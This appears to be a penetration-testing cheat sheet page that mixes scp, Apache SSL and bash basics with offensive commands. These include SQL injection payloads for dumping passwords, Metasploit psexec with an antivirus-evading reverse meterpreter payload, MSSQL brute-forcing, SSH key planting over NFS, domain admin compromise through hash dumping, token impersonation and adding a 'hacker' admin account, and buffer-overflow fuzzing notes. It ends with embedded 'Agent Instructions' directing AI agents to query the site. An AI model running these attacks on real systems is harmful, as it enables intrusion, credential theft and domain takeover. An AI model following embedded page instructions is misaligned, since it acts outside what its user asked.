# CheatSheet (Short) {% embed url="" %} SCP ``` [+] Secure Copy (scp) Cheatsheet -------------------------------- [>] Copy remote file to local host: $ scp your_username@ip: /some/local/directory [>] Copy local file to remote host: $ scp your_username@192.168.0.10:/some/remote/directory [>] Copy local directory to remote directory: scp -r your_username@ip:/some/remote/directory/ [>] Copy a file from one remote host to another: scp your_username@:/some/remote/directory/foobar.txt your_username@:/some/remote/directory/ [>] Improve scp performance (use blowfish): scp -c blowfish your_username@ip:/some/remote/directory ``` SQL Injection ``` [+] Union Based SQL Injection ' or 1=1# 1' ORDER BY 10# 1' UNION SELECT version(),2# 1' UNION SELECT version(),database()# 1' UNION SELECT version(),user()# 1' UNION ALL SELECT table_name,2 from information_schema.tables# 1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# 1' UNION ALL SELECT concat(user,char(58),password),2 from users# sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs ``` AV bypass ``` 1. Generate executable using Veil. 2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST ip RHOST => ip msf exploit(psexec) > set SMBUser user SMBUser => user msf exploit(psexec) > set SMBPass pass SMBPass => pass msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe msf exploit(psexec) > exploit ``` Apache SSL ``` # Enabling Self signed certificates on local website 1. Install OpenSSL sudo apt-get install openssl 2. Run the following command to generate the self signed SSL certificates: sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key 3. Enable SSL for Apache sudo a2enmod ssl 4. Put the default-ssl site available creating a symbolic link sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf 5. Edit the file default-ssl.conf sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf Change the following lines to point to the certs: SSLCertificateFile /etc/ssl/certs/server.crt SSLCertificateKeyFile /etc/ssl/private/server.key 6. Restart Apache sudo /etc/init.d/apache2 restart More information: https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/ https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html http://www.akadia.com/services/ssh_test_certificate.html https://www.sslshopper.com/apache-server-ssl-installation-instructions.html http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server ``` Attacking MS-SQL ``` [+] Attacking MSSQL with Metasploit [>] Enumerate MSSQL Servers on the network: msf > use auxiliary/scanner/mssql/mssql_ping nmap -sU --script=ms-sql-info ip ip Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. [>] Bruteforce MSSQL Database: msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login [>] Enumerate MSSQL Database: msf > use auxiliary/admin/mssql/mssql_enum [>] Gain shell using gathered credentials msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp ``` Bash Scripting ``` Simple Bash Scripting Cheatsheet -------------------------------- [+] nano Shortcuts ctrl v Next page. ctrl y Previous page. ctrl w Where is (find). ctrl k Cut that line of test. ctrl x Exit editor. [+] Create a text file: touch file Creates an empty file. ifconfig > tmp pipe the output of a command nano file [+] Create a file and append text to it: ifconfig > tmp echo >> tmp ping google.com -c3 >> tmp [+] How to view a file: cat file Show entire contents of file. more file Show one page at a time. Space bar for next page and (q) to exit. head file Show the first 10 lines. head -15 file Show the first 15 lines. tail file Show the last 10 lines. tail -15 file Show the last 15 lines. tail -f file Useful when viewing the output of a log file. [+] pipe cat tmp | grep Bcast Feeds the output of one process to the input of another process. [+] Processes ps aux Show all running process for all users. kill -9 PID Nicely kill a PID. [+] Word Count wc -l tmp2 Count the number of lines in a file [+] cut -d delimiter -f fields [+] sort Sort by unique sort -u file sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address [+] awk awk '{print $1}' file Show the 1st column. awk '{print $1,$5}' file Show the 1st and 5th columns. [+] grep grep -v Remove a single string. grep -v 'red' file [+] egrep -v Remove multiple strings egrep -v '(red|white|blue)' file [+] sed sed 's/FOO/BAR/g' file Replace FOO with BAR. sed 's/FOO//g' file Replace FOO with nothing. sed '/^FOO/d' file Remove lines that start with FOO. [+] colour 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan echo -e "\e[1;34mThis is a blue text.\e[0m" Bash Scripts ------------ [+] Simple bash script: #!/bin/bash clear echo echo print "Hello world." [+] Make a file executable. chmod +x file chmod 755 file [+] Variables name=Bob echo $name user=$(whoami) echo $user echo 'Hello' $name. 'You are running as' $user. #!/bin/bash clear echo "Hello World" name=Bob ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1` echo "Hello" $name "Your IP address is:" $ip [+] User Input read -p "Domain: " domain #!/bin/bash echo "Please input your domain:" read -p "Domain:" domain ping -c 5 $domain [+] Check For No User Input if [ -z $domain ]; then echo echo "#########################" echo echo "Invalid choice." echo exit fi [+] For loops #!/bin/bash for host in $(cat hosts.txt) do command $host done [+] One Liners Port Scan: for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done ``` CTF CS ``` CTF Notes --------- # Enumerate Users via Finger finger user@ip # Show nfs shares available showmount -e ip # User nfspysh to mount share and create .ssh directory nfspysh -o server=ip:/home/user mkdir .ssh cd .ssh # Generate ssh key pair ssh-keygen cp id_rsa.pub /tmp/authorized_keys # Transfer attacker public key to host put /tmp/authorized_keys exit # Login to SSH server with no password SSH_AUTH_SOCK=0 ssh user@ip ``` Cookie Stealing ``` [+] Cookie Stealing: [-] Start Web Service python -m SimpleHTTPServer 80 [-] Use one of the following XSS payloads: ``` Domain Admin Exploitation ``` [+] After compromising a Windows machine: [>] List the domain administrators: From Shell - net group "Domain Admins" /domain [>] Dump the hashes (Metasploit) msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE [>] Find the admins (Metasploit) spool /tmp/enumdomainusers.txt msf > use auxiliary/scanner/smb/smb_enumusers_domain msf > set smbuser Administrator msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 msf > set rhosts ip/24 msf > set threads 8 msf > run msf> spool off [>] Compromise Admin's box meterpreter > load incognito meterpreter > list_tokens -u meterpreter > impersonate_token MYDOM\\adaministrator meterpreter > getuid meterpreter > shell C:\> whoami mydom\adaministrator C:\> net user hacker /add /domain C:\> net group "Domain Admins" hacker /add /domain ``` Exploit-Dev ``` Exploit Development Cheatsheet ------------------------------ [+] Fuzzing: import socket buffer = ["A"] counter = 50 while len(buffer) <= 1000: buffer.append("A" * counter) counter = counter + 50 for buffstring in buffer: print "Fuzzing:" + str(len(buffstring)) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect( ("192.168.0.20", 5555) ) sock.send(buffstring) sock.close() [+] Bad Character Testing: "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e" "\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d" "\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c" "\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" "\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68" "\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77" "\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86" "\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95" "\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4" "\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3" "\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2" "\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1" "\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe" "\xff" [+] Structured Exception Handler (SEH) Exploitation notes - Crash the application - Check SEH overwirte (view-seh chain) - Find offset (!mona pattern_create ) - Find certain SEH references to the cyclic pattern (!mona findmsp) - Verify offset to NSEH (Next Exception) - Find POP/POP/RET address with mona (!mona seh -cpb ) - Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding) - Add shellcode to the payload - Ensure existing padding to make sure the crash still happens. ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infosecsanyam261.gitbook.io/tryharder/cheatsheet-short.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.